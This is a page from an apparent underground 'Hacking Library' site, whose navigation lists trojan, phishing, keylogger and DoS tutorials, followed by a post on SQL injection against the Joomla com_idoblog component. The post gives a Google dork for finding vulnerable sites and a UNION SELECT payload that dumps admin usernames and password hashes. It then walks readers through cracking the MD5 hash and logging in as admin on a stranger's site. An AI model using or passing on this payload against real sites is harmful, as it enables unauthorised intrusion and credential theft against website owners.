Magazine posts:
Files available:
38
293
Hacking Library
Main page
Library magazine
Text archives
Trojans related
Password related
Messenger related
IRC related
Virus related
Web bug scanners
Nukers/Flooders
IP Scanners
Security area
Webmasters area
Missing files
About us
Contact us
Links / Affiliates
Underground Libra
DDLbyte.com
Macintosh UG List
Warez Downloads
Progenic Toplist
r00t Security
Suck-O Community
haxxx.net
Direct Downloads
Hacking Library password
 Global tip
Library
Donate to unlock the passworded files and support us!
Library
 
 Most recent posted
  Google's spyware! Aug/8
  Virus spreadingFeb/18
  Setup iStealer for PHP loggingFeb/13
  Password grabbersFeb/12
  Keylogging passwordsFeb/11
  Steal logins with fake sitesAug/3
  Hidden programs in WindowsJul/21
  DoS Attack tutorialJul/18
  SQL Injections tutorialJul/18
  Another phishing tutorialJul/18
  Phishing tutorial Jul/18
  Defacing a website Jul/18
  Whats is hacking? How its done?Jul/18
  Telnet hacking tutorialJul/17
  Simple cmd.exe tricks for startersJul/17
  Hacking a Network ComputerJul/17
  Basics of PHPJul/10
  What is a hacker? Jul/10
  Find an IP address Jul/10
  How a trojan/rat works in few words Jul/10
  How to catch a hacker Jul/10
  Few words about exploits Jul/10
.
Library magazine
Im going to cover some simple SQL Injections. Which we are gonna go through Joomla :)

Alright first you are going to need to go to this link right here:
http://milw0rm.com/exploits/5730. And a Script will come up of what to use. Now you need to 
google this : inurl:com_idoblog

Find a website you wish to Inject.

Now once you have done that.. you will need to copy this :
Code:
/index.php?option=com_idoblog&task=userblog&userid= and 1=1 UNION SELECT 
user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user()
.

Now when you find a website it should look like this
Code:
www.target.com/index.php?
You will need to Erase the /INDEX.PHP?[/CODE] and put in
Code:
/index.php?option=com_idoblog&task=userblog&userid= and 1=1 UNION SELECT 
user(),user(),user(),user(),user(),concat(username,0x3a,password),user(),user()
now press enter.

If the site is vulnerable you will need the name " ADMIN " and then a hash after that.

Go to google, and search " HASH CALCULATOR " get the MD5 hash and then you google " MD5 
CRACKER " and then you just simply fill in what you should do, if the hash is crackable you 
will get a password.

Go back to the site you are injecting and type in ADMIN as the username and put the password 
you got from the hash as the PASSWORD.

Well done you have successfully finished your first SQL Injection :).
Library
Library